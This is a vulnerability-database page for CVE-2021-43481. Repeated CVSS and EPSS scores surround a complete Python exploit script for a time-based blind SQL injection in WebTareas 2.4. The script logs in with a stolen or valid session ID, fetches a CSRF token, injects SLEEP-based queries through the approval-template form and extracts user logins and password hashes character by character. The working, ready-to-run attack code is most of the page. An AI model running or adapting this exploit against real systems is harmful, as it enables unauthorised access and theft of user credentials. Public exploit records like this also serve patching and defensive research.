7.5 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.7 High
AI Score
Confidence
High
0.005 Low
EPSS
Percentile
77.3%
# Exploit Title: WebTareas 2.4 - Blind SQLi (Authenticated)
# Date: 04/20/2022
# Exploit Author: Behrad Taher
# Vendor Homepage: https://sourceforge.net/projects/webtareas/
# Version: < 2.4p3
# CVE : CVE-2021-43481
#The script takes 3 arguments: IP, user ID, session ID
#Example usage: python3 webtareas_sqli.py 127.0.0.1 1 4au5376dddr2n2tnqedqara89i
import requests, time, sys
from bs4 import BeautifulSoup
ip = sys.argv[1]
id = sys.argv[2]
sid = sys.argv[3]
def sqli(column):
print("Extracting %s from user with ID: %s\n" % (column,id))
extract = ""
for i in range (1,33):
#This conditional statement will account for variable length usernames
if(len(extract) < i-1):
break
for j in range(32,127):
injection = "SELECT 1 and IF(ascii(substring((SELECT %s FROM gW8members WHERE id=1),%d,1))=%d,sleep(5),0);" % (column,i,j)
url = "http://%s/approvals/editapprovaltemplate.php?id=1" % ip
GET_cookies = {"webTareasSID": "%s" % sid}
r = requests.get(url, cookies=GET_cookies)
#Because the app has CSRF protection enabled we need to send a get request each time and parse out the CSRF Token"
token = BeautifulSoup(r.text,features="html.parser").find('input', {'name':'csrfToken'})['value']
#Because this is an authenticated vulnerability we need to provide a valid session token
POST_cookies = {"webTareasSID": "%s" % sid}
POST_data = {"csrfToken": "%s" % token, "action": "update", "cd": "Q", "uq": "%s" % injection}
start = time.time()
requests.post(url, cookies=POST_cookies, data=POST_data)
end = time.time() - start
if end > 5:
extract += chr(j)
print ("\033[A\033[A")
print(extract)
break
#Modularized the script for login and password values
sqli("login")
sqli("password")
7.5 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.7 High
AI Score
Confidence
High
0.005 Low
EPSS
Percentile
77.3%